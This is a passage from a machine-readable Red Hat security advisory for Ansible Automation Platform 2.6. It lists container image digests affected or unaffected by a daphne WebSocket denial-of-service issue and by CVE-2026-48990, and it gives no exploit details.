"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "daphne: daphne: Denial of Service via excessive WebSocket message size"
},
{
"cve": "CVE-2026-48990",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-17T22:00:51.839483+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
